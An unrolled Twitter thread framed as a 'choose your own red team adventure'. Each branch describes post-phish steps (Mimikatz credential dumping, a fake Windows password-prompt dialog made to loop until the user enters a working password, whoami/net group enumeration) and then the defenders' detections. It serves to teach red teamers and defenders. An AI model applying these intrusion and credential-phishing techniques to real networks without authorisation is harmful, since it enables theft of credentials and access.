, 42 tweets, 7 min read Read on Twitter
Choose your own #RedTeam adventure.
Your phish lands on a host. What is the first thing you do?

(If 4 answers aren't enough, reply below)
== IF YOU CHOSE MIMIKATZ ==
Congrats. It’s Win 7 and you now have 2 plaintext passwords. One looks like a Domain Admin account!

You attempt to move laterally to another host with the DA password. Access Denied.

What?

Try again.

Access Denied.

Try again!

2/10
You try the second account. It’s not an admin. No dice. Can’t move with it.

The target org doesn’t have any single factor externally facing services. You need to prompt for 2FA, so you go to work building a UI to prompt for the one time passcode.

3/10
30 minutes later, your shell is lost.

Hmm. You try resending your phish to other victims, but your pixel trackers suggest they’re not even landing at all in any inboxes. Your mail service says they were delivered, though.

4/10
You retry to send more phishes with a different domain but don’t switch IPs. Same result. Days go by.

You’re out of time.

GAME OVER

5/10
Post-analysis:

Running Mimikatz tripped a silent alarm, which took 7 minutes to get SOC attention.

The DA password was a simple fake (invoke-honeyaccount). The password wasn’t real. The account has SOC alerts anytime it tries to login.

6/10
By 9 minutes in, the SOC correlated the attempted DA logins on the second host with mimikatz. They started watching your subsequent failed attempts (you tried 8 times!) before you gave up. They also saw the first non-admin account which confirmed patient zero.

7/10
By 30 minutes in, the SOC pulled all traffic sources/destinations from the first host and located the domain that hosted your phish. They blacklisted it by domain, IP at the SMTP gateway and filed an abuse request with the provider.

8/10
They also signatured your payload in your lure using yara, which is why all your future attempts on new infra were futile. Initial execution is hard, that technique took you weeks to work out. Now it’s gone.

9/10
This is what it’s like to go against a good defender. You’ve got to bring your A game, Leroy Jenkins.

10/10
== IF YOU CHOSE PROMPT USER FOR PASSWORDS ==

You saw a nifty tool the other day on a blog. It generates a dialog box that looks similar to the Windows security UI, prompting for passwords. You decided to use it. It's convenient and execute as in-memory PowerShell.

1/18
So you copy the PowerShell, paste it into your C2 backend, and wait.

Response came back: empty string. No password. What happened?

You try on your VM. If the user clicks the "x" it just exits and returns an empty string password.

Try it again.

2/18
After waiting, the response is another empty string. Argh!

You go look at the source code. You're a great Googler. A few minutes later, you found a Stack Overflow article showing you how to disable the "x" button. You repackage and send it in.

3/18
This time you get a response: "asdf"

No way that's the password. You attempt to verify it; result: authentication failure.

You go back to the source code. A few more Stack Overflow articles, you have a version that won't exit until it gets a password that actually works.

4/18
Send the new one. Wait... Got a result. This one looks real. Finally.

You attempt to verify it; result: authentication success. It's legit. Your code works.

Now, what to do with it?

5/18
You didn't notice the user wasn't an admin. There are no lateral movement opportunities with that credential. You consider modifying your code again to prompt for an admin, looping until you get actual admin access.

Then ...

You noticed your shell stopped calling home.

6/18
You try sending your phish to another target. It never arrives.

Maybe it's your hosting provider. You swap and try again. Still never arrives.

You run out of time.

GAME OVER.

7/18
POST ANALYSIS:

You didn't look where you landed or what was running. You didn't notice the EDR product running or the fact that it was PowerShell v5 with central logging turned on.

8/18
All PowerShell logs to a central source, where every hour, the Hunt Team has a query (they can only do it hourly for performance reasons) all executed PowerShell in the environment is queried for the presence of B64 payloads and certain namespaces.

9/18
That means on average you have a 30 minute window. Fortunately for you, your payload landed 12 minutes after the last query, so you had 48 minutes before it percolated into an analyst's queue.

10/18
It was also a busy day at the SOC, they were short-handed, and it was lunchtime, so you got a few extra minutes. They don't just block all PowerShell--they've been wanting to, but had friction internally about making such a policy.

11/18
Your PowerShell was eventually analyzed 82 minutes after your phish landed. Then correlated with the failed authentication attempts at the 93 minute mark. IR began triaging the host you landed on, when ...

12/18
... the Helpdesk escalated a support ticket from the affected user complaining about the 18 password prompts she received today (she counted them).

IR finishes a quick check to ensure no other machines on the network are talking your C2 domain. Nobody was.

13/18
So your domain was blocked from new connections approximately 112 minutes later but the egress stack allows established connections. They finally cut off your connection at 128 minutes.

14/18
Not bad, considering all the teams and moving pieces involved. It certainly helped that nobody in accounting ever runs PowerShell, which they finally used as justification to block it for everyone outside of IT. New policy took effect immediately.

15/18
Any future phishes would have died, because all of your post-exploitation kit is in PowerShell. But, for completeness, they had the ingress team immediately draft a yara rule for the initial phish, which did take them some time, but they had it in place by 140 minutes.

16/18
That explains why switching infrastructure didn't matter. They did notice all of the future attempts coming inbound, though. They created a special queue for them. They observed some tweaks you made and they tweaked yara as well.

Red Teaming can be hard.

17/18
Red Teaming can be hard.

That's ok, this isn't a failure; it helped them improve processes, policy, and detections, but you didn't hit your objective. Not even close.

There's always next time.

THE END

18/18
== IF YOU CHOSE "Figure out where I am" ==

How do you do it?
== IF YOU CHOSE "Figure out what's running" ==

How do you do it?
I should have added:

"I don't know, however beacon does it" 🤣
== IF YOU CHOSE "ifconfig, whoami, net * commands" ==

You run "ipconfig": 10.42.98.19
Then you run "whoami": CORP\Bob
Then you run "whoami /groups": no, Bob is not a local admin, but he does belong to several Accounting groups.
Then you run "net localgroup administrators" to see who the real admins are. You repeat for nested groups. You also look up "net group Domain Admins /domain", for completeness.
After about an hour of looking, and sorting your results in your notes, you have a good list of next targets.

Then your connection drops! What happened? "Maybe Bob just shut his laptop" you say to yourself.
You send your phish to another user, Alice, from another SMTP domain that you frequently use on engagements. You give it an hour or so, but there's no indication it was delivered. So you switch to another domain. And another. You exhaust your list. None of them work.
You run out of time.

GAME OVER.
Post-Analysis:

These commands have been around since the beginning of the command line, and you can execute them in your sleep, which is what you must have been, because you didn't notice endpoint controls running on this host.
Commands are actually new processes, and each process, along with its arguments, are logged centrally by the endpoint detection and response (EDR) product where a combination of commoditized and custom analytics execute against the logs.
One of the analysis layers observed that no other users in Accounting have ever executed “whoami /groups” which flagged that host for review. Your intrusion lasted 58 minutes before your host was put into a containment VLAN & the callback domain was blocked across the enterprise.
The raw Indicators of Compromise (IOCs) were passed to a third-party threat intel team who maintains a large database of domains and IP addresses used maliciously. They reviewed the callback domain, noting that until 11 days ago, it was parked at specific hosting provider.
Pivoting off the original parked IP address, they observed eleven other parked domains, and blacklisted all of them at the enterprise’s edge, which is why your SMTP email from other domains did not work, nor would the callbacks have worked had the payloads landed.
Lesson Learned: know your environment. Red Teaming can be hard.

Your client takes this as validation that their EDR product and hunting processes worked, so it's not a _completely_ wasted effort.
Missing some Tweet in this thread?
You can try to force a refresh.

Like this thread? Get email updates or save it to PDF!

Subscribe to Tim MalcomVetter
Profile picture

Get real-time email alerts when new unrolls are available from this author!

This content may be removed anytime!

Twitter may remove this content at anytime, convert it as a PDF, save and print for later use!

Try unrolling a thread yourself!

how to unroll video

1) Follow Thread Reader App on Twitter so you can easily mention us!

2) Go to a Twitter thread (series of Tweets by the same owner) and mention us with a keyword "unroll" @threadreaderapp unroll

You can practice here first or read more on our help page!

Follow Us on Twitter!

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just three indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!